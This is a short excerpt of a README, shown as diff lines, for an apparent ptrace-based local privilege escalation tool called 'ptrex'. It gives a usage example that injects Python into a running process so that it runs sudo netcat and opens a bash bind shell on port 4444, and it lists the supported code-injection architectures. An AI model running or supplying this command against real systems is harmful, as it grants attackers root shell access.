therealdreg/ptrace_misconfiguration_local_privilege_escalation/README.md

 ```
 ./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'
 ```

+* works for x86_64 systems & x86 systems
+* can inject code from x86_64-ptrex-compiled to x86_64 process
+* can inject code from x86-ptrex-compiled to x86 process
+* can inject code from x86_64-ptrex-compiled to x86 process

+WARNING: inject code from x86-ptrex-compiled to x86_x64 process is not possible

 ## How to test xpk.c:
 Open a terminal with a sudo user group